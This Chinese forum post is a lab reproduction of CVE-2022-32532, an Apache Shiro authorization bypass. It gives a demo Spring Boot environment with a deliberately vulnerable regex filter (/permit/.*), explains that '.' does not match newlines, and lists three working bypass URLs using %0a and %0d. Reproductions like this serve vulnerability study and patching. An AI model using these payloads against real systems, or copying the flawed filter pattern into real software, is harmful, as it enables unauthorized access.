CVE-2022-32532漏洞复现

清欢   ·   发表于 2023-08-02 13:58:36   ·   漏洞文章

CVE-2022-32532漏洞复现

漏洞介绍

  1. CVE-2022-32532是一个Apache Shiro 权限绕过漏洞,当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,
  2. 且正则表达式中携带“.”时,构造特定的payload,可以实现绕过身份认证。

环境搭建

漏洞复现的环境使用的是4ra1n师傅在GitHub上的漏洞环境

  1. https://github.com/Lay0us1/CVE-2022-32532

pom.xml

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3. xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  4. <modelVersion>4.0.0</modelVersion>
  5. <parent>
  6. <groupId>org.springframework.boot</groupId>
  7. <artifactId>spring-boot-starter-parent</artifactId>
  8. <version>2.7.0</version>
  9. <relativePath/>
  10. </parent>
  11. <groupId>com.example</groupId>
  12. <artifactId>shiro-demo</artifactId>
  13. <version>0.0.1-SNAPSHOT</version>
  14. <name>shiro-demo</name>
  15. <description>CVE-2022-32532</description>
  16. <properties>
  17. <java.version>1.8</java.version>
  18. </properties>
  19. <dependencies>
  20. <dependency>
  21. <groupId>org.springframework.boot</groupId>
  22. <artifactId>spring-boot-starter-web</artifactId>
  23. </dependency>
  24. <dependency>
  25. <groupId>org.apache.shiro</groupId>
  26. <artifactId>shiro-spring</artifactId>
  27. <version>1.9.0</version>
  28. </dependency>
  29. </dependencies>
  30. <build>
  31. <plugins>
  32. <plugin>
  33. <groupId>org.springframework.boot</groupId>
  34. <artifactId>spring-boot-maven-plugin</artifactId>
  35. </plugin>
  36. </plugins>
  37. </build>
  38. </project>

ShiroConfig

  1. 用来配置apache shiro的一个类
  1. package com.example.shirodemo;
  2. import org.apache.shiro.mgt.SecurityManager;
  3. import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
  4. import org.springframework.context.annotation.Bean;
  5. import org.springframework.context.annotation.Configuration;
  6. @Configuration
  7. public class ShiroConfig {
  8. @Bean
  9. public SecurityManager securityManager() {
  10. return new DefaultWebSecurityManager();
  11. }
  12. @Bean
  13. public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
  14. MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
  15. shiroFilterFactoryBean.setSecurityManager(securityManager);
  16. return shiroFilterFactoryBean;
  17. }
  18. }

MyShiroFilterFactoryBean

  1. 用来配置shiro使用的过滤方式
  1. package com.example.shirodemo;
  2. import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
  3. import org.apache.shiro.mgt.SecurityManager;
  4. import org.apache.shiro.util.RegExPatternMatcher;
  5. import org.apache.shiro.web.filter.mgt.*;
  6. import org.apache.shiro.web.mgt.WebSecurityManager;
  7. import org.apache.shiro.web.servlet.AbstractShiroFilter;
  8. public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
  9. public MyShiroFilterFactoryBean() {
  10. super();
  11. }
  12. @Override
  13. protected AbstractShiroFilter createInstance() {
  14. SecurityManager securityManager = this.getSecurityManager();
  15. FilterChainManager manager = new DefaultFilterChainManager();
  16. manager.addFilter("myFilter",new MyFilter());
  17. // my filter
  18. manager.addToChain("/permit/.*", "myFilter");
  19. // todo: add other filters
  20. PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
  21. chainResolver.setFilterChainManager(manager);
  22. // set RegExPatternMatcher
  23. chainResolver.setPathMatcher(new RegExPatternMatcher());
  24. return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
  25. }
  26. static class SpringShiroFilter extends AbstractShiroFilter {
  27. protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
  28. this.setSecurityManager(webSecurityManager);
  29. this.setFilterChainResolver(resolver);
  30. }
  31. }
  32. }

MyFilter

  1. package com.example.shirodemo;
  2. import org.apache.shiro.util.RegExPatternMatcher;
  3. import org.apache.shiro.web.filter.AccessControlFilter;
  4. import javax.servlet.ServletRequest;
  5. import javax.servlet.ServletResponse;
  6. import javax.servlet.http.HttpServletRequest;
  7. import java.io.IOException;
  8. public class MyFilter extends AccessControlFilter {
  9. public MyFilter(){
  10. super();
  11. this.pathMatcher = new RegExPatternMatcher();
  12. }
  13. @Override
  14. protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
  15. String token = ((HttpServletRequest)request).getHeader("Token");
  16. // todo: check permission ...
  17. return token != null && token.equals("4ra1n");
  18. }
  19. @Override
  20. protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
  21. System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
  22. try {
  23. response.getWriter().println("access denied");
  24. } catch (IOException e) {
  25. e.printStackTrace();
  26. }
  27. return false;
  28. }
  29. }

DemoController

  1. package com.example.shirodemo;
  2. import org.springframework.web.bind.annotation.PathVariable;
  3. import org.springframework.web.bind.annotation.RequestMapping;
  4. import org.springframework.web.bind.annotation.RestController;
  5. @RestController
  6. public class DemoController {
  7. @RequestMapping(path = "/permit/{value}")
  8. public String permit(@PathVariable String value) {
  9. System.out.println("success!");
  10. return "success";
  11. }
  12. // Another Bypass
  13. // @RequestMapping(path = "/permit/*")
  14. public String permit() {
  15. System.out.println("success!");
  16. return "success";
  17. }
  18. }

整个目录结构

漏洞核心分析:

  1. 1.RegExPatternMatcher()
  2. 2./permit/.*
  3. shiro使用RegExPatternMatcher()时候,就会使用正则表达式进行过滤,当你的过滤表达式为:/permit/.*时候,你可能想表达的
  4. 意思是/permit/目录下的全部子路径,但是在正则表达式中"."这个元字符,是不包括/r和/n的,也就是说,绕过/permit/后面的子目录
  5. 中存在/r或者/n,则就无法匹配上,从而实现了apache shiro的绕过

漏洞复现

  1. 利用上述环境,使用idea进行启动

访问/permit/fkalis,发现没有权限

尝试构造payload

  1. http://192.168.2.8:8081/permit/%0afkalis
  2. http://192.168.2.8:8081/permit/%0dfkalis
  3. http://192.168.2.8:8081/permit/%0a%0dfkalis

成功绕过shiro的检验

  1. spring security中也有个类似的原理的漏洞,也是利用正则表达式处理的问题,从而可以实现绕过
用户名金币积分时间理由
Track-魔方 100.00 0 2023-08-08 11:11:29 期待同学更多实战方面的文章~

打赏我,让我更有动力~

1 条回复   |  直到 2023-8-8 | 997 次浏览

Track-魔方
发表于 2023-8-8

与CVE-2022-22978漏洞产生原理本质上是一样的,因此放到一起打赏

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.